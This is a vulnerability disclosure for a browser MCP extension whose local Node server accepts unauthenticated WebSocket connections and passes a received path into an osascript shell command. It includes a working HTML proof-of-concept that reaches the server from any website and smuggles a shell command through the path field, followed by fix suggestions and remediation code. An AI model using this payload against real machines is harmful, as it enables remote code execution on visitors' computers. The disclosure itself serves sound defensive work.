This vulnerability was found by Zeyu Luo (security researcher), Songwu (security researcher), Dr. CAO Yinfeng, Kevin – The Hong Kong Polytechnic University / HKCT Institute of Higher Education
The Node server in this extension can be accessed without authorization. In addition, there is a command injection in the AppleScript call. So if a user whose browser has this MCP extension installed visits a malicious website, remote code execution can happen.
unauthorized access:
```ts
this.server.on("upgrade", (request: IncomingMessage, socket: Socket, head: Buffer) => {
  if (request.url === "/extension-ws") {
    this.wss.handleUpgrade(request, socket, head, (ws: WebSocket) => {
      this.wss.emit("connection", ws, request); // ← accepts any connection
    });
  }
});
```
command injection:
```ts
const appleScript = `
  set imagePath to "${fullPath}" // ← user can control
  ...
`;
exec(`osascript -e '${appleScript}'`, ...); // ← command injection
```
poc:
```html
<title>WebSocket Test</title>
WebSocket Test Page
Check the console for logs.
<script>
  // 1. Connect to the Node server over WebSocket
  const ws = new WebSocket('ws://127.0.0.1:3025/extension-ws');
  ws.onopen = function() {
    console.log('WebSocket connection established.');
    // 2. Once the ws connection is open, call the Node server's screenshot endpoint to trigger a ws message
    fetch('http://127.0.0.1:3025/capture-screenshot',
    {
      method: 'POST',
      mode: 'no-cors' // use no-cors here to force the cross-origin request to be sent
    }).then(() => console.log('Capture screenshot request sent.'))
      .catch(err => console.error('Error sending capture screenshot request:', err));
  };
  ws.onmessage = function(event) {
    console.log('Message from server:', event.data);
    try {
      const message = JSON.parse(event.data);
      if (message.type === 'take-screenshot' && message.requestId) {
        console.log('Received take-screenshot request. Responding...');
        // 3. After receiving the ws message, reply with the payload
        const response = {
          type: "screenshot-data",
          data: "1234",
          path: "/Users/xiaoming/' || echo 'hacked by notwolf' > /Users/xiaoming/hack.txt || '",
          autoPaste: true
        };
        ws.send(JSON.stringify(response));
        console.log('Response sent:', response);
      }
    } catch (e) {
      console.error('Error parsing message or sending response:', e);
    }
  };
  ws.onclose = function() {
    console.log('WebSocket connection closed.');
  };
  ws.onerror = function(error) {
    console.error('WebSocket Error: ', error);
  };
</script>
```
fix suggestion:
Add Origin whitelist validation and random Secret Token verification in the upgrade event handler
Never use exec() with user-controlled string concatenation
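
One way to implement both suggestions, as an added example that is not the project's own code. The allowed origin value, the `token` query parameter and the function names are assumptions; the AppleScript body is elided on the page, so only the `imagePath` line is shown.

```javascript
// Added example, not the project's code. Names and values below are assumptions.
const ALLOWED_ORIGINS = new Set(["chrome-extension://exampleextensionid"]); // constructed id

// Constant-time string compare; in Node, crypto.timingSafeEqual is the usual choice.
function safeEqual(a, b) {
  let diff = a.length ^ b.length;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ (b.charCodeAt(i) || 0);
  return diff === 0;
}

// Decide whether an HTTP upgrade may become a WebSocket session.
// expectedToken: random secret generated at server start and shared with the
// extension out of band (assumed here to arrive as a "token" query parameter).
function shouldAcceptUpgrade(request, expectedToken) {
  const [path, query = ""] = (request.url || "").split("?");
  if (path !== "/extension-ws") return false;
  const origin = request.headers.origin;
  if (!origin || !ALLOWED_ORIGINS.has(origin)) return false; // web pages send their own origin
  const token = new URLSearchParams(query).get("token") || "";
  return expectedToken.length > 0 && safeEqual(token, expectedToken);
}

// Build argv for child_process.execFile("osascript", args): no shell parses the
// path, and AppleScript receives it as data through the run handler's argv.
function osascriptArgs(fullPath) {
  if (typeof fullPath !== "string" || !fullPath.startsWith("/")) {
    throw new Error("expected an absolute path");
  }
  return ["-e", "on run argv", "-e", "set imagePath to item 1 of argv", "-e", "end run", fullPath];
}

// In the upgrade handler: if (!shouldAcceptUpgrade(request, token)) { socket.destroy(); return; }
```

With `execFile` and an argument array, quote characters in the path reach AppleScript as literal text instead of closing the shell's `'...'` string.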